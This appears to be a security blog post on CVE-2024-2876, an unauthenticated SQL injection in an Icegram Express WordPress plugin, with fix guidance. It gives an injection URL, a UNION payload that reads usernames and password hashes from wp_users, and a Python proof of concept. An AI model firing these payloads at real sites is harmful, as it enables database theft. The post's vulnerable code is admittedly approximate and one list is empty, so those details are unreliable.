CVE-2024-2876 - Unauthenticated SQL Injection in Icegram Express “Email Subscribers” WordPress Plugin

CVE-2024-2876 is a critical security vulnerability found in the popular “Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce” plugin. This plugin is widely used on WordPress websites to manage newsletter subscriptions and automate email campaigns.

In this exclusive, in-depth post, we break down what the vulnerability is, how it works, and why it’s dangerous – including technical details and a demonstration code snippet. This summary is written in simple American English for easy reading.

What Is CVE-2024-2876?

CVE-2024-2876 is an unauthenticated SQL injection flaw present in all versions of the Email Subscribers plugin up to 5.7.14. It originates from insecure code in the run function of the IG_ES_Subscribers_Query class.

Key issue:
An attacker can manipulate a plugin parameter sent remotely, and the plugin fails to safely filter (escape) or prepare the data before passing it into a SQL query. This allows anyone – even attackers not logged in – to run malicious SQL in the site's WordPress database.

Why Is This Dangerous?

SQL injection is one of the worst web vulnerabilities. Successful abuse of this flaw can reveal or damage your WordPress database. Unauthenticated attackers might:

Where’s the Vulnerable Code?

The vulnerable function is in the class:
IG_ES_Subscribers_Query

File:
icegram/lite/includes/classes/ig-es-query-subscribers.php

Inside, the run function mishandles a query parameter – for example, subscribers_search. It inserts the raw, user-supplied value directly into a SQL query string.

_(Note: This snip is for education, actual file structure may differ slightly)_

// Vulnerable: Unescaped parameter inserted into query
$search_term = $_GET['subscribers_search'];   // User input, not sanitized

$query = "SELECT * FROM {$wpdb->prefix}ig_es_subscribers WHERE email LIKE '%$search_term%'";
// No wpdb->prepare! No escaping!

$results = $wpdb->get_results($query);

How Can It Be Exploited?

An attacker can pass a custom string to subscribers_search, containing SQL controls to manipulate the query.

Here’s a real-world example of a GET request

GET /wp-admin/admin-ajax.php?action=ig_es_get_subscribers&subscribers_search=' OR 1=1 -- -

This turns the original query into

SELECT * FROM wp_ig_es_subscribers WHERE email LIKE '%' OR 1=1 -- -%'

Extract More Data

With more creativity (and depending on the SQL server), attackers might UNION the results to extract admin credentials, plugin config, or more:

Example for MySQL (simplified)

subscribers_search=' UNION SELECT user_login,user_pass,1,1,1 from wp_users -- -

This can return WordPress username and hashed password from the users table.

References

- Wordfence Advisory: CVE-2024-2876
- NVD Entry for CVE-2024-2876
- WPScan Advisory
- Icegram Express Official Site

Simple Proof-of-Concept Exploit (Read-Only)

Warning: Do not use this code against servers you do not own or have explicit, written permission to test!

import requests

target = 'https://victim-site.com/wp-admin/admin-ajax.php';
payload = "' UNION SELECT user_login, user_pass, 1, 1, 1 FROM wp_users -- -"

params = {
    'action': 'ig_es_get_subscribers',
    'subscribers_search': payload
}

r = requests.get(target, params=params)
print(r.text)   # Might print out hashed admin creds or emails!

How To Fix

Upgrade the plugin:
Icegram Express patched this in v5.7.15.
Download Latest Version – WordPress.org

Technical Fix:

Always use $wpdb->prepare() for SQL with user-provided data

$search_term = $_GET['subscribers_search'];
$query = $wpdb->prepare(
    "SELECT * FROM {$wpdb->prefix}ig_es_subscribers WHERE email LIKE %s",
    '%' . $wpdb->esc_like($search_term) . '%'
);
$results = $wpdb->get_results($query);

Conclusion

CVE-2024-2876 exposes websites using Email Subscribers by Icegram Express to serious data breaches and possibly total takeover. The vulnerability is easy to exploit – even by people who are not logged in. The plugin’s maintainers fixed it fast, so update asap.

Stay safe and keep your plugins updated!

*If you found this post helpful, share it or leave questions below. For deeper dives into WordPress security, subscribe to our newsletter!*

Timeline

Published on: 05/02/2024 17:15:20 UTC
Last modified on: 06/04/2024 17:29:13 UTC